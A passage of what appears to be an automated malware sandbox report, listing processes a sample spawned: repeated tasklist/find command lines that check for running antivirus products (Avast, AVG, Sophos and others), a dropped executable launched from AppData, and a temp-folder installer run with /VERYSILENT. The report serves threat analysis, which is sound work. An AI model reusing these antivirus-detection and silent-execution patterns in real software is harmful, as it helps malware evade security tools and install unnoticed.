MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:54
Start time:04:36:37
Start date:23/12/2024
Path:C:\Windows\System32\find.exe
Wow64 process (32bit):false
Commandline:find /I "avastui.exe"
Imagebase:0x7ff61dd10000
File size:17'920 bytes
MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:55
Start time:04:36:39
Start date:23/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"
Imagebase:0x7ff6fd780000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:56
Start time:04:36:39
Start date:23/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6684c0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:57
Start time:04:36:39
Start date:23/12/2024
Path:C:\Windows\System32\tasklist.exe
Wow64 process (32bit):false
Commandline:tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
Imagebase:0x7ff7bda80000
File size:106'496 bytes
MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:58
Start time:04:36:39
Start date:23/12/2024
Path:C:\Windows\System32\find.exe
Wow64 process (32bit):false
Commandline:find /I "avgui.exe"
Imagebase:0x7ff61dd10000
File size:17'920 bytes
MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:59
Start time:04:36:40
Start date:23/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"
Imagebase:0x7ff6fd780000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:60
Start time:04:36:40
Start date:23/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6684c0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:61
Start time:04:36:40
Start date:23/12/2024
Path:C:\Windows\System32\tasklist.exe
Wow64 process (32bit):false
Commandline:tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
Imagebase:0x7ff7bda80000
File size:106'496 bytes
MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:62
                                                                                                                                                                                                                                            Start time:04:36:40
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\find.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:find /I "nswscsvc.exe"
                                                                                                                                                                                                                                            Imagebase:0x7ff61dd10000
                                                                                                                                                                                                                                            File size:17'920 bytes
                                                                                                                                                                                                                                            MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:63
                                                                                                                                                                                                                                            Start time:04:36:41
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"
                                                                                                                                                                                                                                            Imagebase:0x7ff6fd780000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:64
                                                                                                                                                                                                                                            Start time:04:36:41
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff6684c0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:65
                                                                                                                                                                                                                                            Start time:04:36:41
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
                                                                                                                                                                                                                                            Imagebase:0x7ff7bda80000
                                                                                                                                                                                                                                            File size:106'496 bytes
                                                                                                                                                                                                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:66
                                                                                                                                                                                                                                            Start time:04:36:41
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\find.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:find /I "sophoshealth.exe"
                                                                                                                                                                                                                                            Imagebase:0x7ff61dd10000
                                                                                                                                                                                                                                            File size:17'920 bytes
                                                                                                                                                                                                                                            MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:67
                                                                                                                                                                                                                                            Start time:04:36:42
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Roaming\Panorado\electronics.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Roaming\Panorado\\electronics.exe" "C:\Users\user\AppData\Roaming\Panorado\\crooners.eml"
                                                                                                                                                                                                                                            Imagebase:0x270000
                                                                                                                                                                                                                                            File size:943'784 bytes
                                                                                                                                                                                                                                            MD5 hash:3F58A517F1F4796225137E7659AD2ADB
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                            Target ID:68
                                                                                                                                                                                                                                            Start time:04:36:55
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exe"
                                                                                                                                                                                                                                            Imagebase:0xca0000
                                                                                                                                                                                                                                            File size:18'610'385 bytes
                                                                                                                                                                                                                                            MD5 hash:0EFDBBF3F5074D596D3E61446B623942
                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                            Programmed in:Borland Delphi
                                                                                                                                                                                                                                            Antivirus matches:
                                                                                                                                                                                                                                            • Detection: 18%, ReversingLabs
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:69
                                                                                                                                                                                                                                            Start time:04:36:57
                                                                                                                                                                                                                                            Start date:23/12/2024
                                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\is-6GF75.tmp\V2DDYDPIWYUTCJYUB0IV5.tmp
                                                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\is-6GF75.tmp\V2DDYDPIWYUTCJYUB0IV5.tmp" /SL5="$6036C,17641136,845824,C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exe"
                                                                                                                                                                                                                                            Imagebase:0x2a0000
                                                                                                                                                                                                                                            File size:3'366'912 bytes
                                                                                                                                                                                                                                            MD5 hash:D8F3F93349755C2BD326DF91966FD6F5
                                                                                                                                                                                                                                            Has elevated privileges:false
Has administrator privileges: false
Programmed in: Borland Delphi
Has exited: true

Target ID: 70
Start time: 04:37:02
Start date: 23/12/2024
Path: C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exe" /VERYSILENT
Imagebase: 0xca0000
File size: 18'610'385 bytes
MD5 hash: 0EFDBBF3F5074D596D3E61446B623942
Has elevated privileges: false
Has administrator privileges: false
Programmed in: Borland Delphi
Has exited: false

Target ID: 71
Start time: 04:37:03
Start date: 23/12/2024
Path: C:\Users\user\AppData\Local\Temp\is-BAC82.tmp\V2DDYDPIWYUTCJYUB0IV5.tmp
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Local\Temp\is-BAC82.tmp\V2DDYDPIWYUTCJYUB0IV5.tmp" /SL5="$80362,17641136,845824,C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exe" /VERYSILENT
Imagebase: 0xef0000
File size: 3'366'912 bytes
MD5 hash: D8F3F93349755C2BD326DF91966FD6F5
Has elevated privileges: false
Has administrator privileges: false
Programmed in: Borland Delphi
Has exited: false

No disassembly